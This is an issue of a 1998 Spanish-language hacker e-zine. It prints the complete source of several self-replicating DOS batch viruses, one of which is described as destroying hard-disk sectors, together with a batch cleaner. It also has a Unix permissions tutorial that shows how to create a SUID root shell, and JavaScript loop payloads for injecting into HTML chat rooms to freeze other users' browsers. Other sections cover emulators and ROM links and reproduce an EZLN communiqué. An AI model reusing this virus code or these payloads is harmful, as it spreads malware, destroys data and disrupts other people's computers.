                               <<::RareGaZz::>>
                                "CyberHerejes"
   
                           Arkangel Azumlord Groovy
                           |KillerBot Orion Vov_77|
                           |GuyBrush RareTrip Mr.X|
                           y ServerHacker.Team 1998

                              Edicion:  RareGaZz

 Manual de Bolsillo electrico acondicionado y reforzado para ofrecer la
 libertad de palabra en internet. El contenido esta creado totalmente por
 personas ajenas a la editorial y su contenido es responsabilidad absoluta de
 los escritores que lo hacen de manera anonima y no existe manera de conocer
 sus identidades por lo que si no estas de acuerdo con los contenidos de
 RareGaZz borra el archivo de tu sistema y calla boca. Swoish.

 " En la ciudad de Mexico durante el Teleton: `Como estan?' -dice Lucero
   y retorciendose en sus sillas contesta la audiencia: `Discapacitados!' "




 Aqui de nuevo amigos cybernautas despues de un largo tiempo de reposo debido
 a las fiestas navideas y ao nuevo. Queremos agradecer a los encargados del
 dominio acapulco.uagro.mx que nos han prestado un sub-dominio en
 http://raregazz.acapulco.uagro.mx asi como a los tipos fuertes de
 http://islatortuga.com que nos han dado sus servicios gratuitamente unicamen-
 te para ofrecer a ustedes este E-Zine.

 ahora algo maniaco: RareGaZz cumple un ao en Febrero! Asi es, apenas estamos
 saliendo del cascaron pero esperamos mejorar en todo para los siguientes
 aos. Ustedes pensaran: 10 numeros en un ao?? Patetico! Y es cierto pero
 que vamos a hacer?

 Por favor actualicen sus paginas linkeando a RareGaZz a esta direccion:
 http://www.visitweb.com/raregazz gracias.

 Disfruten es para ustedes . . R4r37r1P & R4r3g4Z2 734/\/\
                                 -Hackeando tu sistema-


                                                               y hasta pronto.



                               VIRUS BATCH ! 1/2
                         PERMISOS DE ARCHIVOS EN UNIX
                    EMULADORES Y ROMS -LA ULTIMA AVENTURA-
                         HACKEANDO CHAT ROOMS DE HTML
             COMUNICADO DEL EZLN SOBRE LA GUERRA EN CHIAPAS MEXICO
              COMO MANDAR MENSAJES GRATIS DESDE UN MOVIL DIGITAL
                         SHELL ACCOUNTS DE UNIX GRATIS
                     COMO USAR GLIDE (CON QUE Y PARA QUE)
             ANARQUIA...MAS SOBRE EL ARTE DE HERIR COSAS VIVIENTES
                       EXISTE LA ANONIMIDAD EN LA RED?
                 NAVEGANDO ANONIMAMENTE  -SERVIDORES PROXIES-
                             COMANDO TOUCH DE UNIX
                LAS POSIBILIDADES EN WINDOWS NT -PRIMERA PARTE-
                            MAS BICHOS EN INTERNET
                      RELIGION Y OTRAS COSAS INSERVIBLES
                            BUSCADORES EN INTERNET
               WORLD WIDE WEB = EL MERCADO MAS GRANDE DEL MUNDO
                   UNIX SISTEM V INTERFACE DEFINITION (SVID)
                    LA GUIA PARA JODER CUALQUIER AUTOMOVIL
                    CRACKS - HACKS Y KAOS CON UN HEXEDITOR
                                  NOTI-LOONZ
                             B 0 0 /\/\ 3 R 4 N G




  *****************
  * VIRUS BATCH ! *             Por :  -/| Yo Soy |\-
  *****************
    PARTE 1 DE 2


Introduccion:

Las personas generalmente creen que los virus batch no son una forma
confiable de infectar. Bueno. Te dejo que opines tu mismo con esto, es
cierto que unos virus no son chingones, pero aqui no es necesario saber de
algun lenguaje de programacion, solo debes de saber hacer archivos .bat. :)
Los virus se supone que son faciles de limpiar. :( Agarra un mendigo editor
y orale !

Aqui te pongo 5 virus que me econtre por ahi. Se supone que si sirven.

--------------------------- Caracteristicas ---------------------------

* Infectan unicamente archivos batch que no esten protegidos.
* No afectan el funcionamiento de los batch que infecta, se ejecutan
  normalmente, pero el virus toma control de el despues de que el batch
  acabo de hacer todas sus ejecuciones.
* Se necesita Ms-Dos 5 o mayor ( no se... :)


------------------------------- LOS VIRUS
-------------------------------

ZEP     (165)   - El virus mas pequeo hasta ahora.

XOP     (361)   - Infecta 2 batchs por ejecucion.

POT     (685)   - Infecta 1 batch por ejecucion, si no puede infectar
                  ninguno, pone 2 bombas ANSI.

SKUL    (497)   - Este es un virus PELIGROSO ! XD, es el que mas me ha
                  gustado. Sobrescribe cerca de 8000 sectores del disco
                  duro el dia 20 de cada mes. TEN CUIDADO! ( no juegues
                  con fuego :)

ZOP_B   (615)   - Infecta 2 batchs por ejecucion. No es muy impresionante
                  no veras mucho despues de su ejecucion.

Las bombas ANSI solo funcionaran si ANSI.SYS esta cargado en el memoria.
Todos los virus excepto ZEP se mentienen con una copia en la raiz del
disco duro.

-------------------------------- ZEP.BAT
----------------------------------

@echo off%[ZeP]%
if not exist %0.bat goto ZeP
for %%f in (*.bat ..\*.bat) do set ZeP=%%f
find /i "ZeP"<%ZeP%>nul
if errorlevel 1 find "ZeP"<%0.bat>>%ZeP%
:ZeP

-------------------------------- XOP.BAT
----------------------------------

@echo off%[XoP]%
if '%XoP%=='11 goto XoP2
if '%2=='_ goto XoP1
if exist C:\XoP.bat goto XoP
if not exist %0.bat goto XoP2
find "XoP"<%0.bat>C:\XoP.bat
attrib C:\XoP.bat +h
:XoP
for %%v in (*.bat ..\*.bat) do call C:\XoP %%v _
set XoP=
goto XoP2
:XoP1
find /i "XoP"<%1>nul
if not errorlevel 1 goto XoP2
type C:\XoP.bat>>%1
set XoP=%XoP%1
:XoP2

-------------------------------- POT.BAT
----------------------------------

@echo off%_PoT%
if '%PoT%=='I goto PoTz
if '%1=='_ goto PoTi
if exist C:\PoT.bat goto PoT
if not exist %0.bat goto PoTz
find "PoT"<%0.bat>C:\PoT.bat
attrib C:\PoT.bat +h
:PoT Makes You Feel Goodz
for %%f in (*.bat ..\*.bat C:\*.bat) do call C:\PoT.bat _ %%f
if '%PoT%=='I goto PoTf
set PoT=
echo %PoT%[32;" Estas paralizado !                           "p
echo %PoT%[96;" C:\PoT";13p%PoT%[2A
echo.%_PoT%|time|find "00">nul
if errorlevel 1 goto PoTf
echo %PoT%[1A%PoT%[s%PoT%[1;37;44m
echo %PoT%[3;9H Dejame salir de aqui ! %PoT%[0m%PoT%[u
:PoTf gold
set PoT=
goto PoTz
:PoTi nfect
find /i "PoT"<%2>nul
if not errorlevel 1 goto PoTz
type C:\PoT.bat>>%2
set PoT=I
:PoTz

---------------------------------- SKUL
-----------------------------------

:: [8mSKuL
@echo off%[SKuL]%
echo.|date|find "20">nul%[SKuL]%
if errorlevel 1 goto SKuL1
echo SKuL Fregando el disco duro...
::echo    &>SKuL.com
::SKuL
:SKuL1  [6A2
if exist C:\SKuL goto SKuL2
if not exist %0.bat goto SKuL
find "SKuL"<%0.bat>C:\SKuL
attrib C:\SKuL +h
:SKuL2  [5A
set SKuL=C:\AUTOEXEC.BAT
for %%f in (D:*.bat C:*.bat ..\*.bat) do set SKuL=%%f
if not exist %SKuL% goto SKuL
find /i "SKuL"<%SKuL%>nul
if errorlevel 1 type C:\SKuL>>%SKuL%
set SKuL=
:SKuL  [7A [0m

-------------------------------- ZOP_B.BAT
----------------------------------

@echo off
:: [8m --- [ZoP_B] Batch Infector ---
if '%2=='ZoP_ goto ZoP_1
if '%1=='ZoP_ echo  ["`";"`"p
:: ["`";" ZoP_B ZoP_";13p
:: [4AZoP_
if exist c:\ZoP_B.bat goto ZoP_
if not exist %0.bat goto ZoP_2
echo @echo Off>c:\ZoP_B.bat
find "ZoP_"<%0.bat>>c:\ZoP_B.bat
attrib c:\ZoP_B.bat +h
:: [6AZoP_
:ZoP_
for %%v in (*.bat) do call c:\ZoP_B %%v ZoP_
if '%ZoP_%==' for %%v in (..\*.bat) do call c:\ZoP_B %%v ZoP_
set ZoP_=
goto ZoP_2
:: [6AZoP_
:ZoP_1
if '%ZoP_%=='11 goto ZoP_2
find "ZoP_"<%1>nul
if not errorlevel 1 goto ZoP_2
type c:\ZoP_B.bat>>%1
set ZoP_=%ZoP_%1
:ZoP_2
::ZoP_ [7A [0m

--------------------------------------------------------------------------

BATCH VIRUS REMOVER
===================

Este archivo limpiara los virus batch de los que vimos atras en el documento.
Basicamente, quita todas las lineas que contengan una cadena de caracteres
especifica provista por el archivo. Es inecesario el decir que si lo llamas
con la cadena de caracteres incorrecta reducira tus archivos batch a una puta
mierda :) , asi que ten cuidado, si no tienes la necesidad de usarlo, mejor.
Ha sido escrito para uso en Ms-Dos 6 o mayor, ( o por lo menos el arhivo
CHOICE.COM ), es requerido porque el removedor pide la confirmacion de cada
archivos antes de limpiarlo. Asi que tu no debes limpiar un archivo original
si no estas seguro.

Para usarlo, ( yo no lo he usado, asi que no me hago responsable :),
determina que tipo de cadena de caracteres quieres limpiar, por ejemplo: Si
yo tengo el un virus batch que contenga 'GreeZ' en cada linea ( aqui voy otra
vez ) como lo siguiente:

::
:: Archivo infectado
::
ctty nul%_GeeZ%
for %%a in (C:*.bat ..\*.bat) do set GeeZ=%%a
find "GeeZ"<%GeeZ%
if errorlevel 1 find "GeeZ"<%0.BAT>>%GeeZ%
ctty con%_GeeZ%

Para remover eso, solo pon "CLEANBAT GeeZ".

---------------------------- CLEANBAT.BAT
----------------------------------
@echo off
if '%1=='%temp% goto remove
if exist C:\DOS\CHOICE.COM goto start
echo Este archivo necesita CHOICE.COM en C:\DOS!
:start
echo **** REMOVEDOR DE VIRUS BATCH ****
echo.
echo Cuidado! Si la llave no es unica destruira archivos!
echo Sintax: CLEANBAT llave1 [llave2] donde llave1 es la llave
echo UNICA que identificara al virus.
echo.
set ks=%1
set is=%2
if '%ks%==' goto exit
if '%is%==' set is=%ks%
if '%temp%==' set temp=C:\
echo Proceder a remover %ks% de archivos que contienen %is%. Si?
choice /c:yn>nul
if errorlevel 2 goto exit
for %%v in (*.bat) do call %0 %temp% %%v
if exist rem$$_ del rem$$_
goto exit
:remove
find "%is%"<%2>nul
if errorlevel 1 goto done
echo Found in %2 - remove?
choice /c:yn>nul
if errorlevel 2 goto done
find /v "%ks%"<%2>rem$$_
copy rem$$_ %2>nul
goto done
:exit
set is=
set ks=
:done

Otra forma de limpiar archivos bat infectados por un virus batch es cargar
el archivo en un editor ( como el edit de ms-dos ) e ir quitando las lineas
aadidas al programa, recuerda que hay unos que tiene una copia la raiz con
el atributo de ocultos, solo usa  ATTRIB filename -s -r -h  y eliminalos.

Despedida:

Ha ! Estos 5 virus se me hacen un poco pequeos y casi inofensivos.
Este esta mejor, que lo disfruten...

----------------------( VIRUS MELT_ )------------------------------

@if not '%0==' if '%_melt%==' goto meltbeg
::---- dummy host --------
@echo off
echo Hello World!
::---- end dummy host ----

@goto MeLTend [MeLT_2a]
:MeLTbeg
@echo off%_MeLT%
if '%1=='MeLT goto MeLT%2
if not exist %comspec% set comspec=%_MeLT%command
%comspec% /e:5000 /c %0 MeLT vir
set MeLTcl=%1 %2 %3 %4 %5 %6 %7 %8 %9
call %0 MeLT rh
set _MeLT=
set MeLTcl=
goto MeLTend
:MeLTrh
set _MeLT=x
%0 %MeLTcl%
:MeLTvir
set MeLTH=%0
if not exist %_MeLT%%temp%\nul set temp=%tmp%
if exist %temp%\MeLT_2a goto MeLTrun
%0 MeLT fnd . %path%
:MeLTfnd
shift%_MeLT%
if '%2==' exit MeLT
set MeLT=%2\%MeLTH%.bat
if not exist %MeLT% set MeLT=%2\%MeLTH%
if not exist %MeLT% set MeLT=%2%MeLTH%.bat
if not exist %MeLT% set MeLT=%2%MeLTH%
if not exist %MeLT% goto MeLTfnd
find "MeLT"<%MeLT%>%temp%\MeLT_2a
attrib %temp%\MeLT_2a +h
:MeLTrun
%MeLTH% MeLT s . .. %path%
:MeLTs
shift%_MeLT%
if '%2==' exit MeLT
for %%a in (%2\*.bat %2*.bat) do call %MeLTH% MeLT inf %%a
goto MeLTs
:MeLTinf
find /i "MeLT"<%3>nul
if not errorlevel 1 goto MeLTno
echo @if not '%%0==' if '%%_melt%%==' goto meltbeg>MeLT.t
type %3>>MeLT.t
echo.>>MeLT.t
type %temp%\MeLT_2a>>MeLT.t
move MeLT.t %3>nul
exit MeLT
:MeLTact - flash-melt screen text then put back to normal
echo e 100 BA D0 07 BB 00 B8 8E C3 8B CA 33 FF 26 8B 05 FE>MeLT.t
echo e 110 C0 FE C4 26 89 05 47 47 E2 F2 FE 06 24 01 75 E8>>MeLT.t
echo e 120 B4 4C CD 21 00>>MeLT.t
echo g>>MeLT.t
debug<MeLT.t>nul
del MeLT.t
exit MeLT
:MeLTno
set MeLTC=%MeLTC%1
if %MeLTC%==1111111111 goto MeLTact
:MeLTend

----------------------------( FIN )-----------------------------------

Originalmente en :  Batch file viruses tutor 1.
Ok , eso es todo por hoy....   STAY KILLING HARD DISKS !!

Traduccion y adaptado por:  -/| Yo Soy |\-    mierda@hotmail.com

\/|R|| !




                  PERMISOS Y PROPIETARIOS DE ARCHIVOS EN UNIX
                 ============================================

Todos los archivos y directorios en los Unix's tienen propietarios y permisos,
es la base de la seguridad de archivos del sistema. Se pueden cambiar los
permisos y los propietarios para restar o agregar restricciones de acceso.
Los permisos son tambien los que definen si un archivo se puede ejecutar como
un comando.
cuando tipeamos ls -l vemos algo como esto:

-rwxr-x---   1 vorax     users          65 Dec 13 15:59 prueba*
drwx------   2 vorax     users        1024 Dec 12 00:02 tmp/

El primer campo es el que indica los permisos (-rwxr-x---). Tambien vemos que
"vorax" es el *usuario* propietario del archivo y "users" es el *grupo*
propietario.
/tmp es un directorio, el primer caracter de los permisos es una "d".
Estos son los caracteres que pueden aparecer al principio de los permisos:

                   Caracter    Significado
                 Ŀ
                   -     |  Archivo comun                   
                   d     |  Directorio                      
                   b     |  Block Device (disco,CD-ROM,etc) 
                   l     |  Symbolic Link (BSD o V.4)       
                   s     |  Socket (BSD o V.4)              
                   =     |  FIFO (System V, Linux)          
                 

Los permisos se interpretan asi:

 Son 10 caracteres, si quitamos el primero que es el que indica el tipo de
 archivo nos quedan 9 que se agrupan de a tres:

                  Ŀ
                   propietario     grupo   otros usuarios 
                    (owner)       (group)    (others)     
                    | rwx |       | r-x |    | --- |      
                  
           r= read-lectura  w= write-escritura  x=eXecute-ejecucion

Con estos datos sabemos que el usuario propietario del archivo (owner) puede
leer(r), escribir(w) y ejecutar(x). Los miembros del grupo propietario pueden
leerlo(r) y ejecutarlo(x). Los otros usuarios no pueden hacer nada (---)

En el caso del directorio (/tmp):
(drwx------)
En un directorio los caracteres se interpretan asi:
r= Permite ver el contenido del directorio con ls.
w= Se pueden crear, mover o borrar archivos dentro del directorio.
x= Se puede acceder al directorio mediante cd.
Lo mas comun para un directorio es r-x o rwx.


Modo numerico
-------------
Los permisos pueden representarse con tres numeros octales (base 8) (ej:664)
y podemos usar el modo numerico para cambiar los permisos a un archivo.
El primer digito indica los privilegios del propietario, el segundo los del
grupo y el tercero los de los otros usuarios. Cada digito se obtiene sumando
todos los  privilegios (rwx) de cada propietario (owner,group,others): Cada
privilegio es un bit de un grupo de 3, su valor posicional si valen 1:
      r=4 w=2 x=1
Ŀ Volviendo a nuestro ejemplo (-rwxr-x---)
owner = rwx = 4+2+1 = 7  la codificacion numerica es 750 y este numero
group = r-x = 4+1   = 5  se obtiene de la forma que se muestra en la figura.
other = --- =         0  Si tomamos cada digito octal como un numero de tres
                     750 digitos binarios. Y si consideramos que si el
 permiso esta habilitado es 1 y si no 0, entonces
r-x seria 101 en binario, en decimal 4+0+1=5,y obtenemos un digito del permiso
octal.
Los mas comunes son : 0,1,4,5,6,7 y en los tres casos: 600 750 640 644
SUID: 4000 SGID: 2000 (ver mas adelante)

CAMBIAR PERMISOS (comando chmod)
--------------------------------

Cuando creamos un archivo nos convertimos en sus propietarios y podemos
cambiar los permisos de este mediante el comando "chmod"

              <=SOLO EL PROPIETARIO PUEDE CAMBIAR LOS PERMISOS=>

La sintaxis es: chmod <especificacion> archivo_o_directorio

Hay dos formas de cambiar los permisos: en forma numerica o con codigos de
letras.

 =Modo numerico=

(en el prompt del UNIX)
unix:~$ ls -l prueba
-rwxr-x---   1 vorax     users          65 Dec 13 15:59 prueba*

unix:~$chmod 511 prueba
unix:~$ls -l prueba
-r-x--x--x   1 vorax  users           65 Dec 13 15:59 prueba*

unix:~$chmod 710 prueba
unix:~$ls -l prueba
-rwx--x---   1 vorax  users           65 Dec 13 15:59 prueba*

Aunque al principio puede parecer dificil, posiblemente el modo numerico
sea el que mas uses. Arriba explico como se obtiene el numero.

 =Modo simbolico=

La sintaxis es: chmod [ugoa...][=-+][rwxXstugo][...] pueden hacerse
multiples operaciones simbolicas separadas por comas.

1) Primero debemos especificar que permisos queremos modificar mediante una
   letra: u= los del propietario (user)
          g= los del grupo  (group)
          o= los de los otros (other)
          a= los de todos (ugo)
2) Debemos indicar si agregamos o sacamos un permiso, + y - respectivamente
   o si lo modificamos, signo =

3)Indicamos los permisos mediante el codigo de letras.
Ejemplo, para agregar el permiso de lectura para el grupo y los otros:

unix:~$ chmod go+r

otros ejemplos :
unix:~$ ls -l prueba
-rwxr-x---   1 vorax     users          65 Dec 13 15:59 prueba*

unix:~$ chmod u-w,g-r,o+x prueba
unix:~$ ls -l prueba
-r-x--x--x   1 vorax  users           65 Dec 13 15:59 prueba*

unix:~$ chmod u+w,o-x prueba
unix:~$ ls -l prueba
-rwx--x---   1 vorax  users           65 Dec 13 15:59 prueba*

unix:~$chmod a+x,u-rw prueba
unix:~$ ls -l prueba
---x--x--x   1 vorax  users           5 Dec 13 15:59 prueba*

NOTAS

Estos comandos son equivalentes: chmod ugo+rx  =igual a= chmod a+rx

Se pueden usar comodines: chmod a-r *sec* (saca permiso de lectura a todos
los archivos que tengan "sec" en su nombre: seco.txt casiseco.txt,etc)

Varios archivos a la ves: chmod a+x zap.x wedit.x

Recursivamente (como attrib /s en DOS) chmod a-r * -R (saca permiso de lectura
a todos los archivos y directorio del directorio actual y subdirectorios)

Si un directorio tiene permiso de escritura para todos (chmod o+w) cualquiera
puede borrar los archivos que esten adentro sin importar los permisos.

Cualquiera con permisos de lectura puede copiar el archivo. El propietario
de la copia es el que la copio.

Chmod no cambia los permisos de un link, si no del archivo al que este apunta.

SUID y GUID
===========

Hay casos en que un usuario comun necesita tener privilegios. Por ejemplo
el programa passwd que permite cambiar el password de un un usuario necesita
escribir en /etc/passwd, y un usuario comun no tiene privilegios para hacerlo.
Para solucionar esto UNIX permite que un programa se 'encubra' bajo la
identidad de su propietario, asumiendo un UID o GID distinto al del usuario
que lo ejecuto. Un programa que puede hacer esto se denomina SUID o SGID.
Cuando un programa SUID se ejecuta, el "effective UID" (EUID) es el del
propietario del archivo, aunque el usuario que lo ejecuto sea otro.
Si seteamos los bits de permiso suid o sgid a un archivo ejecutable, otros
usuarios pueden tener acceso a los mismos recursos (mediante el ejecutable)
que los propietarios reales. Ejemplo:

el programa cat que se encuentra generalmente en /bin nos permite ver el
contenido de un archivo al que tenemos acceso de lectura:

unix:~$ cat /etc/passwd
root:KQc4YhmF6pc6X:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
[sigue]

Los permisos normales de /bin/cat son:
unix:~$ls -l /bin/cat
-rwxr-xr-x   1 root     bin          7737 Aug  6  1995 /bin/cat*

SI SOMOS ROOT PODEMOS HACER ESTO:

unix:~$chmod u+s /bin/cat          (agregamos suid a /bin/cat)
unix:~$ls -l /bin/cat
-rwsr-xr-x   1 root     bin          7737 Aug  6  1995 /bin/cat*
(  ^-la x de ejecucion fue reemplazada por una "s")

Entonces cada vez que un usuario usa "cat" toma momentaneamente la identidad
de su propietario (root) por lo tanto puede leer cualquier archivo aunque
no tenga permisos reales (si de Carlos) para hacerlo. :)
Si seteamos suid un shell tenemos acceso de root como si entramos con login
y password: (HAY QUE SER ROOT PARA HACER ESTO)

unix:~$cp /bin/sh ./rootsh
unix:~$chmod u+s rootsh
unix:~$ls -l rootsh
-rwsr-xr-x   1 root     users      299649 Dec 13 18:56 rootsh*
unix:~$rootsh
unix:~#    (somos root :)

Si rootsh tuviera estos permisos:
-rwsr-sr-x   1 juan     clientes   299649 Dec 13 18:56 rootsh*
Tomariamos la identidad de "juan" y el grupo "clientes", aunque realmente
fueramos "carlos" del grupo "users".

NOTAS

Si encontramos un archivo suid escribible por nosotros es suficiente para
ganarse el r00t.

No les recomiendo dejar shells suid root en los lugares que hakean como
forma para volver a entrar, muchas utilidades de seguridad los  detectan
y hay mejores metodos para asegurarse el reingreso.

Estos comandos son equivalentes: chmod a+x,u+s  =igual a= chmod 4111
                                 chmod a+x,g+s  =igual a= chmod 2111
                                 chmod u+s,g+s  =igual a= chmod 6111

Sticky Bit= si la ultima x de un archivo es un "t" el programa
es Sticky. Esta permiso en archivos es obsoleto pero se usa en directorios.

Este comando muestra todos los SUID find / -type f -perm +u+s  -ls

Si un archivo es SUID o SGID pero no ejecutable (!) se ve una S mayuscula
prueben!.

CAMBIAR PROPIETARIOS (chown,chgrp)
---------------------------------
Para cambiar el grupo o usuario propietario de un archivo, se debe ser
"dueo" del mismo, o root. Para cambiar el grupo se debe pertenecer a el.

Sintaxis:
Cambiar grupo  :    chgrp <grupo> archivo
Cambiar 'owner':    chown <usurio> archivo

Ejemplos:
unix:~$chown vorax .hosts_n (cambio el propietario del archivo .hosts_n)
unix:~$chgrp users .hosts_n (cambio el grupo propietario del archivo)
unix:~$chown vorax *       (todos los archivos del directorio)
unix:~$chown vorax .titbax prueba ckd.c (varios archivos)

Si usamos los numeros UID o GID:
unix:~$chown 501 .rare.txt  (507 es el UID del usuario)
unix:~$chgrp 100 .rare.txt  (100 es GID del grupo)

Todo junto:
chown  usuario:grupo archivo

unix:~$chown juan:users juan.txt (setea usuario:grupo de una vez)
unix:~$chown juan:         (setea usuario y el grupo con el que esta logeado)

Y todas las combinaciones posibles...
Usen el comando id en cada uno de los ejemplos para entender mejor.
===========================================================================
<VoraX> 12/97 Bs As





                              EMULADORES Y ROMS
                           = la ultima aventura =

 Todos sabemos que en el mercado existen muchisimas consolas de videojuegos
 que permiten jugar y entrener un rato pero cada una de estas con marcadas
 diferencias. El caso de esto bien podria ser la comparacion entre el Sega
 Genesis y el Nintendo 64, muchos de nosotros hemos jugado o tenemos uno de
 estos aparatos pero ahora por internet, podemos tener los dos e incluso
 muchos mas como el primer nintendo, el super nintendo, ahora ya los CD's de
 playstation, Intellevision o la ultima consola de sega. Todas estas consolas
 estan disponibles en internet.

 Podemos usar estos sistemas gracias a los emuladores; aparatos que usando
 software simulan el ambiente de otra computadora o de otro lenguaje de
 programacion para ejecutar el codigo y ver los resultados en otro sistema que
 en este caso seria, tu pc.

 En un principio la emulacion era lenta y solo existian juegos para game boy
 (recuerdan tetris? :) pero gracias a programadores que empezaron a
 interesarse en la emulacion esta fue evolucionandose y lograr la emulacion
 rapida de casi cualquier juego incluso aquellos que necesitan hardware
 especial como el chip fx del star fox.

 Existen muchos emuladores que pueden conseguirse en internet para emular
 estos programas con diferencias en velocidad, sonido, etc. Ademas dependiendo
 de la computadora que tengas sera el juego. Por ejemplo no intentes ejecutar
 el emulador de Super Nintendo en una 486!

 NESticle 0.43 (nueva version disponible en la pagina de RareGaZz) Es el mejor
 emulador de el viejo Nintendo, debes tenerlo, la nueva version permite jugar
 por modem -version windows-.

 Genecyst es otro buen emulador de los creadores de Nesticle (BloodLust) este
 emulador es el mejor de Genesis.

 SNES9x con este programa podras jugar el Super Nintedo en tu PC pero con un
 sonido malo y lento en algo menos de Pentium.

 Los juegos o programas de estas consolas se conocen como ROMS y pueden ser
 encontrados por todo internet obviamente estos juegos tienen derechos de
 autor y por eso son ilegales. Nintendo comenzo a promorcionar los emuladores
 con restricciones tipo shareware y que podian ser usados por unicamente
 24 horas o ser borrados, asi nacio la idea y si nintendo podia copiar los
 cartuchos a programas de PC, por que no empezar a hacerlo?

 Algunos Links

 http://www.emulation.net/ Emulaciones para los Maqueros.

 http://www.media.dsi.unimi.it/mame/ Emuladores "Arcade" para juegos de
                                     maquinitas.

 http://www4.ncsu.edu/~bwmott/www/2600/ Roms y Emuladores de Atari 2600

 http://www.users.zetnet.co.uk/ahornby/v2600.html Mas Atari 2600

 http://www.general.uwa.edu.au/u/darrins/2600/welcome.html ...Atari 2600

 http://www.geocities.com/SiliconValley/9461/emulate.htm Atari 5200

 http://www.komkon.org/fms/ColEm/ Colecovision

 http://www.davesclassics.com/  Colecovision, etc.

 http://www.komkon.org/fms/iNES/  Nintendo

 http://users.uniserve.com/~thebrain/ Nintendo

 http://thunderstrike.simplenet.com/Roms/index.html  Nintendo

 http://www.parallax.co.uk/%7Elmw/  Emuladores de Vectrex

 Bueno ahora que ya tienen a las grandes compaias de videojuegos por los
 huevos... a jugar.




                         HACKEANDO CHAT ROOMS DE HTML
                         

que onda raza? Yo aqui, empezando en esto de la tecnologia. Alguien preguntaba
en el numero 5, como tomar poder de algun chat. Encontre un par de scripts,
que no he podido probar. Ahi les van:

1) <script language=javascript> for(i=1; i<2;){ alert("texto") }</script>

2) <script language=javascript>a=1; for(i=1; i<2;){a=a+1}</script>

El numero dos lo que provoca es un bucle que se repite a si mismo un numero
de veces determinado y que en tiempo se traduce en unos 30  45 segundos
dependiendo del procesador de la maquina. Transcurrido este tiempo volvera a
salir otro mensaje esta vez del propio navegador y despues de este volvera a
la normalidad.
La ventaja de este programa es que mientras se esta leyendo el bucle, el
ordenador queda totalmente inoperativo y no se puede hacer nada de nada.
La desventaja es que en los futuros navegadores es posible que no se produzca
este bucle, las razones son tecnicas y no creo que valga la pena explicarlas
ademas del tiempo que nos llevaria. Y la otra desventaja es que dependiendo
del sistema operativo que se use se puede anular este bucle manualmente.

El numero uno lo que provoca es un bucle que se repite a si mismo e
indefinidamente haciendo imposible que se pueda salir de el, por lo que
el ordenador del usuario leera una y otra vez este bucle y no podra salir
de el. En el lugar donde se pone el texto sera el mensaje que le saldra al
usuario una y otra vez. Asi que sustituye el (texto) por el mensaje que
quieras. La ventaja de este programa es que el funcionamiento esta casi
garantizado ante la llegada de futuros navegadores mas modernos, y la
desventaja (aunque yo no diria desventaja) es que el ordenador no queda
totalmente inoperativo, lo unico que queda inoperativo es el navegador o
la ventana del navegador.

* IMPORTANTE: cuando escribas estos programas en el chat y pulses el
boton de enviar, estos se ejecutaran a todos los usuarios que esten
conectados (excepto en los chats que se pueden mandar a una sola persona)
en cualquiera de los dos casos, estos programas tambien se ejecutaran en
tu computadora, cosa que nos fastidiaria mucho porque tambien se nos
bloquearia a el ordenador a nosotros, entonces lo que se puede hacer son
muchas cosas, la mas sencilla es, o bien mirar en el Trumpet y vigilar a
ver cuando nuestro mensaje es enviado por el modem (cosa un poco
complicada si no se tiene un poco de idea), o bien pulsar el boton de
"Enviar" propio del chat y esperar a que la pantalla se ponga en blanco
(esto significa que se ha borrado toda la pantalla para cargarla de nuevo
con los mensajes actualizados) entonces pulsar Stop.

Un Saludo pa la banda y que les aproveche

Filo

 [ Aqui en RareGaZz hemos probado los trucos con buenos resultados.En algunos
   chats fue necesario incluir la etiqueta </XMP> o </PRE> antes del codigo
   javascript. ]





Comunicado del Comite Clandestino Revolucionario Indigena Comandancia General
del Ejercito Zapatista de Liberacion Nacional. Mexico.

23 de Diciembre de 1997.

Al pueblo de Mexico;
A los pueblos y gobiernos del mundo;
A la prensa nacional e internacional;

Hermanos:

En relacion con la matanza de indigenas en la comunidad Acteal, municipio de
San Pedro de Chenalho, Chiapas, realizada el dia de ayer, 22 de diciembre de
1997, el EZLN seala:

Primero. De acuerdo a la informacion recabada hasta ahora, unos 60
paramilitares del Partido Revolucionario Institucional (patrocinados por los
gobiernos federal y estatal) fueron los que atacaron con armas de grueso
calibre a los indigenas desplazados que se encontraban refugiados en Acteal.

Segundo. Como resultado de la agresion que duro hasta 4 horas, fueron
asesinados cuando menos 45 indigenas, entre los que se cuentan 9 varones,
21 mujeres y 15 nios (uno de ellos menor de un ao de edad). Ademas de los
muertos, quedaron heridos 7 hombres (4 son nios) y 10 mujeres (4 de ellas
son nias).

Tercero. De acuerdo a transmisiones radiales del Gobierno de Chiapas
(interceptadas por el EZLN), en las inmediaciones de Acteal y al tiempo que
se realizaba la masacre, policias de Seguridad Publica del estado de Chiapas
respaldaron la agresion y, en horas de la tarde y noche, se dedicaron a
recoger cadaveres para ocultar la magnitud de la matanza. Los seores Homero
Tovilla Cristiani y Uriel Jarquin (Secretario y Subsecretario del Gobierno de
Chiapas respectivamente), comisionaron a la policia para respaldar este
crimen. El seor Julio Cesar Ruiz Ferro estuvo continuamente informado del
desarrollo del "operativo" (cuando menos desde las 12 horas del dia 22 de
diciembre, cuando la matanza llevaba ya una hora). Aprobado por los gobiernos
federal y estatal, el ataque se afino el dia 21 de diciembre en una reunion de
paramilitares (dirigida por el Seor Jacinto Arias, presidente municipal
priista) de las comunidades Los Chorros, Puebla, La Esperanza y Quextic, todas
estas del municipio de Chenalho.

Cuarto. La responsabilidad directa de estos hechos sangrientos recae en
Ernesto Zedillo Ponce de Leon y la Secretaria de Gobernacion, quienes desde
hace dos aos dieron luz verde al proyecto de contrainsurgencia presentado
por el Ejercito federal.

Dicho proyecto intenta desplazar la guerra zapatista hacia un conflicto entre
indigenas, motivado por diferencias religiosas, politicas o etnicas.

Para cumplirlo, se dedicaron a financiar equipo y armamento (mediante fondos
de la Secretaria de Desarrollo Social) y a dar entrenamiento militar (dirigido
por oficiales del Ejercito federal) a indigenas reclutados por el Partido
Revolucionario Institucional.

Para dar tiempo a que estos escuadrones de la muerte estuvieran listos, el
gobierno federal mexicano diseo una estrategia paralela de dialogo simulado,
consistente en llevar una negociacion sin intencion alguna de cumplir lo que
se acordara y aumentando la presencia militar en las zonas zapatistas.

El gobierno del Estado de Chiapas quedo encargado de garantizar la impunidad
de los grupos paramilitares y facilitar su operacion en las principales zonas
rebeldes: norte, selva y Altos de Chiapas.

Quinto. De esta manera unieron sus fuerzas los gobiernos federal y estatal,
el Partido Revolucionario Institucional y el Ejercito federal. Su objetivo
esta sintetizado por el "grito de guerra" de los paramilitares llamados
"mascara roja": "Vamos a acabar con la semilla zapatista", es decir, "vamos a
acabar con las comunidades indigenas".

